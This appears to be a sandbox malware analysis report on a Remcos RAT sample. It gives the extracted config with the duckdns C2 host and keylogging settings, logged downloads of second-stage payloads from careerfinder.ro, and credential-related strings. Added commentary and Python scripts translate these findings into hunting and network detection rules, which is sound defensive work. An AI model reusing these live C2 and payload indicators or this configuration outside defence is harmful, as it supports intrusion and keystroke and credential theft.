2024-10-16T13:08:18.336471+0200 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49894 | 94.198.96.165 | 53848 | TCP
2024-10-16T13:08:17.984442+0200 | 2803304 | 3 | Unknown Traffic | 192.168.2.5 | 49895 | 178.237.33.50 | 80 | TCP

AV Detection

                Source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "iniiivan.duckdns.org:53848:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-G9FJB6", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                Source: Yara match | File source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                Source: Submitted Sample | Integrated Neural Analysis Model: Matched 98.2% probability
                Source: unknown | HTTPS traffic detected: 185.248.196.6:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.248.196.6:443 -> 192.168.2.5:49870 version: TLS 1.2
                Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb | source: powershell.exe, 00000005.00000002.2390118940.0000000007FC0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32A | source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: .Core.pdbB | source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: stem.Core.pdbF | source: powershell.exe, 00000005.00000002.2376551918.0000000006F61000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_234B10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,LdrInitializeThunk,FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 8_2_234B6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0040AE51 FindFirstFileW,FindNextFileW
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
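                The configuration block above tells a responder what to hunt for on other hosts, but only once the extractor's field names are translated into concrete artefacts. The Python below is an added example, not part of the Joe Sandbox report and not Remcos code: it parses the extractor's JSON as printed above, derives the mutex, the Run keys, the keylog file and the C2 endpoint, and checks them against a small list of events constructed from this report's own findings (mutant created, file dropped, DNS query, TCP connection). "Application path" is resolved to C:\ProgramData\remcos because that is where this run dropped logs.dat; the dynamic-DNS suffix list is an assumption and not exhaustive.

```python
import json

# Configuration as printed by the report's extractor above, trimmed to the fields used here.
REMCOS_CONFIG_JSON = r'''{"Host:Port:Password": "iniiivan.duckdns.org:53848:1",
 "Assigned name": "RemoteHost", "Install flag": "Disable",
 "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable",
 "Install path": "Application path", "Copy file": "remcos.exe",
 "Mutex": "Rmc-G9FJB6", "Keylog flag": "1", "Keylog path": "Application path",
 "Keylog file": "logs.dat", "Keylog crypt": "Disable"}'''

# Events constructed from this report's own findings (mutant created, file dropped,
# DNS query, TCP connection); a real run would read them from the sandbox JSON or EDR.
OBSERVED_EVENTS = [
    {"type": "mutant", "name": "\\Sessions\\1\\BaseNamedObjects\\Rmc-G9FJB6"},
    {"type": "file_dropped", "path": "C:\\ProgramData\\remcos\\logs.dat"},
    {"type": "dns", "name": "iniiivan.duckdns.org"},
    {"type": "tcp", "dst": "94.198.96.165", "dport": 53848},
]

DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net", "hopto.org")  # assumption, not exhaustive
RUN_KEY = "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"


def parse_c2(field):
    """Split the extractor's 'host:port:password' string (one entry on this page)."""
    host, port, password = field.rsplit(":", 2)
    return {"host": host, "port": int(port), "password": password,
            "dynamic_dns": host.lower().endswith(DYNDNS_SUFFIXES)}


def expected_artifacts(cfg_json, app_dir):
    """Translate the extracted config into host and network artefacts to hunt for.

    app_dir is what the config's 'Application path' resolved to; the config does not
    say, the report does (C:\\ProgramData\\remcos on this run)."""
    cfg = json.loads(cfg_json)
    art = {"mutex": cfg["Mutex"], "c2": parse_c2(cfg["Host:Port:Password"]),
           "run_keys": [], "copy_file": None, "keylog": None}
    for hive in ("HKCU", "HKLM"):
        if cfg.get(f"Setup {hive}\\Run") == "Enable":
            art["run_keys"].append(hive + RUN_KEY)
    if cfg.get("Install flag") == "Enable":  # Disable on this page: no copied remcos.exe expected
        art["copy_file"] = app_dir.rstrip("\\") + "\\" + cfg["Copy file"]
    if cfg.get("Keylog flag") == "1":
        kdir = app_dir if cfg["Keylog path"] == "Application path" else cfg["Keylog path"]
        art["keylog"] = {"path": kdir.rstrip("\\") + "\\" + cfg["Keylog file"],
                         "plaintext": cfg.get("Keylog crypt") == "Disable"}
    return art


def correlate(art, events):
    """Report which predicted artefacts the observed events confirm."""
    c2 = art["c2"]
    seen = {"mutex": False, "keylog_file": False, "c2_dns": False, "c2_port": False}
    for ev in events:
        if ev["type"] == "mutant" and ev["name"].rsplit("\\", 1)[-1] == art["mutex"]:
            seen["mutex"] = True
        elif (ev["type"] == "file_dropped" and art["keylog"]
              and ev["path"].lower() == art["keylog"]["path"].lower()):
            seen["keylog_file"] = True
        elif ev["type"] == "dns" and ev["name"].lower() == c2["host"].lower():
            seen["c2_dns"] = True
        elif ev["type"] == "tcp" and ev["dport"] == c2["port"]:
            seen["c2_port"] = True
    return seen


if __name__ == "__main__":
    artefacts = expected_artifacts(REMCOS_CONFIG_JSON, "C:\\ProgramData\\remcos")
    print(json.dumps(artefacts, indent=1))
    print(correlate(artefacts, OBSERVED_EVENTS))
```

                Two things the derived artefacts make explicit: "Keylog crypt" is Disable, so logs.dat on this host is plaintext keystroke data and should be handled as if it contains credentials; and "Install flag" is Disable, so no copied remcos.exe is expected and the persistence actually observed on this run is the reg.exe Run-key entry listed under System Summary, which re-launches the PowerShell stage rather than a dropped binary.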

                Networking

                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49887 -> 94.198.96.165:53848
                Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49894 -> 94.198.96.165:53848
                Source: Malware configuration extractor | URLs: iniiivan.duckdns.org
                Source: unknown | DNS query: name: iniiivan.duckdns.org
                Source: global traffic | TCP traffic: 192.168.2.5:49887 -> 94.198.96.165:53848
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
                Source: Joe Sandbox View | IP Address: 178.237.33.50
                Source: Joe Sandbox View | ASN Name: ASSEFLOWAmsterdamInternetExchangeAMS-IXIT
                Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49895 -> 178.237.33.50:80
                Source: global traffic | HTTP traffic detected: GET /vn/Traurigheder.sea HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Host: careerfinder.ro; Connection: Keep-Alive
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /vn/Traurigheder.sea HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Host: careerfinder.ro; Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /rs/wQpkVl14.bin HTTP/1.1; User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0; Host: careerfinder.ro; Cache-Control: no-cache
                Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1; Host: geoplugin.net; Cache-Control: no-cache
                Source: msiexec.exe, 00000008.00000002.3305869425.0000000023480000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe, 0000000D.00000003.2626119936.000000000306A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginVivaldi equals www.facebook.com (Facebook)
                Source: msiexec.exe, 0000000D.00000003.2626119936.000000000306A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginVivaldi equals www.yahoo.com (Yahoo)
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                Source: msiexec.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000008.00000002.3306498912.0000000023CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                Source: msiexec.exe, 00000008.00000002.3306498912.0000000023CF0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000D.00000002.2626726547.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                Source: global traffic | DNS traffic detected: DNS query: careerfinder.ro
                Source: global traffic | DNS traffic detected: DNS query: iniiivan.duckdns.org
                Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
                Source: powershell.exe, 00000002.00000002.2148055608.0000024101D9A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://careerfinder.ro
                Source: msiexec.exe, 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
                Source: powershell.exe, 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000002.00000002.2148055608.0000024100001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2362758455.00000000043D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.ebuddy.com
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2598283322.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597717153.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597755288.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597734505.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.com
                Source: msiexec.exe, 00000010.00000002.2598283322.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597717153.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597755288.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000010.00000003.2597734505.0000000000B1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.imvu.comata
                Source: msiexec.exe, 00000008.00000002.3305869425.0000000023480000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                Source: msiexec.exe, 00000008.00000002.3305869425.0000000023480000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.imvu.comr
                Source: powershell.exe, 00000002.00000002.2184487775.000002417A384000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.
                Source: msiexec.exe, 0000000D.00000002.2626896117.0000000000C2F000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net
                Source: msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.nirsoft.net/
                Source: bhv792D.tmp.13.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                Source: bhv792D.tmp.13.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                Source: bhv792D.tmp.13.dr | String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                Source: powershell.exe, 00000002.00000002.2148055608.0000024100001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000005.00000002.2362758455.00000000043D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
                Source: powershell.exe, 00000002.00000002.2148055608.000002410022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2148055608.0000024101614000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://careerfinder.ro
                Source: msiexec.exe, 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://careerfinder.ro/
                Source: msiexec.exe, 00000008.00000002.3304833813.0000000022FC0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://careerfinder.ro/rs/wQpkVl14.bin
                Source: msiexec.exe, 00000008.00000002.3293007161.00000000076D3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://careerfinder.ro/rs/wQpkVl14.bini
                Source: powershell.exe, 00000002.00000002.2148055608.000002410022C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://careerfinder.ro/vn/Traurigheder.seaP
                Source: powershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://careerfinder.ro/vn/Traurigheder.seaXR
                Source: powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000005.00000002.2362758455.0000000004527000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 00000002.00000002.2148055608.0000024100C14000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                Source: msiexec.exe, 0000000D.00000003.2615654429.0000000004A31000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2615901380.0000000004A35000.00000004.00000020.00020000.00000000.sdmp, bhv792D.tmp.13.dr | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: msiexec.exe, 0000000D.00000003.2615654429.0000000004A31000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2615901380.0000000004A35000.00000004.00000020.00020000.00000000.sdmp, bhv792D.tmp.13.dr | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: msiexec.exe, 0000000D.00000003.2626119936.000000000306A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2615654429.0000000004A31000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000D.00000003.2615901380.0000000004A35000.00000004.00000020.00020000.00000000.sdmp, bhv792D.tmp.13.dr | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: msiexec.exe | String found in binary or memory: https://login.yahoo.com/config/login
                Source: powershell.exe, 00000002.00000002.2175598804.0000024110071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2369581141.0000000005439000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                Source: msiexec.exe, msiexec.exe, 00000010.00000002.2597967190.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
                Source: msiexec.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49870
                Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknown | HTTPS traffic detected: 185.248.196.6:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 185.248.196.6:443 -> 192.168.2.5:49870 version: TLS 1.2
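                The Networking findings above show the whole chain on the wire: the second-stage downloads from careerfinder.ro (note the User-Agent on the /rs/wQpkVl14.bin request, which begins with "5.0 (" because the "Mozilla/" product token is missing), the DNS lookup of a duckdns.org name, a TLS connection to that host on port 53848, and a GET to geoplugin.net/json.gp, the geolocation lookup Remcos performs at start-up. The Python below is an added example, not part of the report: it replays a list of flow records constructed from these findings through four rules an analyst could run over DNS, proxy and flow logs. The dynamic-DNS suffix list and the "standard port" set are assumptions; the Suricata JA3 match above remains the stronger signal, since it keys on the TLS client fingerprint rather than on where the client connects.

```python
import re

# Flow records constructed from the Networking findings above; "t" is only an ordering.
FLOWS = [
    {"t": 1, "kind": "dns", "src": "192.168.2.5", "qname": "careerfinder.ro"},
    {"t": 2, "kind": "http", "src": "192.168.2.5", "dst": "185.248.196.6", "dport": 443,
     "host": "careerfinder.ro", "path": "/vn/Traurigheder.sea",
     "ua": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"},
    {"t": 3, "kind": "http", "src": "192.168.2.5", "dst": "185.248.196.6", "dport": 443,
     "host": "careerfinder.ro", "path": "/rs/wQpkVl14.bin",
     "ua": "5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0"},
    {"t": 4, "kind": "dns", "src": "192.168.2.5", "qname": "iniiivan.duckdns.org"},
    {"t": 5, "kind": "tcp", "src": "192.168.2.5", "dst": "94.198.96.165", "dport": 53848},
    {"t": 6, "kind": "dns", "src": "192.168.2.5", "qname": "geoplugin.net"},
    {"t": 7, "kind": "http", "src": "192.168.2.5", "dst": "178.237.33.50", "dport": 80,
     "host": "geoplugin.net", "path": "/json.gp", "ua": None},
]

DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.com", "ddns.net", "hopto.org")  # assumption, extend
STANDARD_PORTS = {80, 443, 53, 25, 587, 993, 995}                           # assumption
# A User-Agent whose product token is gone starts with a bare version, e.g. "5.0 (Windows"
BROKEN_UA = re.compile(r"^\d+\.\d+ \(")


def detect(flows):
    """Run four rules over flow records and return (rule, evidence) pairs in time order."""
    alerts = []
    dyndns_clients = set()  # clients seen resolving a dynamic-DNS name
    for f in sorted(flows, key=lambda r: r["t"]):
        if f["kind"] == "dns":
            if f["qname"].lower().endswith(DYNDNS_SUFFIXES):
                dyndns_clients.add(f["src"])
                alerts.append(("dyndns_query", f["qname"]))
        elif f["kind"] == "tcp":
            # The Remcos C2 on this page is TLS on 53848, opened right after the duckdns lookup
            if f["dport"] not in STANDARD_PORTS and f["src"] in dyndns_clients:
                alerts.append(("dyndns_then_nonstandard_port", f"{f['dst']}:{f['dport']}"))
        elif f["kind"] == "http":
            if f["host"] == "geoplugin.net" and f["path"] == "/json.gp":
                alerts.append(("geoplugin_lookup", f["host"] + f["path"]))
            if f["ua"] and BROKEN_UA.match(f["ua"]):
                alerts.append(("malformed_user_agent", f["host"] + f["path"]))
    return alerts


if __name__ == "__main__":
    for rule, evidence in detect(FLOWS):
        print(f"{rule:32} {evidence}")
```

                The third rule only fires when the same client resolved a dynamic-DNS name earlier in the window, which keeps it quiet on hosts that merely use unusual ports; the malformed User-Agent rule is cheap and, on this sample, pinpoints the request that fetched the encrypted second stage.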

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Windows\SysWOW64\msiexec.exe | Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0041183A OpenClipboard,GetLastError
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

                E-Banking Fraud

                Source: Yara match | File source: 00000008.00000002.3285922374.000000000329F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000003.2572731984.0000000007739000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3293007161.0000000007712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000003.2628002795.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3293007161.000000000773B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.3293007161.0000000007728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                System Summary

                Source: amsi32_6504.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 3664, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: Process Memory Space: powershell.exe PID: 6504, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_00401806 NtdllDefWindowProc_W
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 13_2_004018C0 NtdllDefWindowProc_W
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_004016FD NtdllDefWindowProc_A
                Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 14_2_004017B7 NtdllDefWindowProc_A
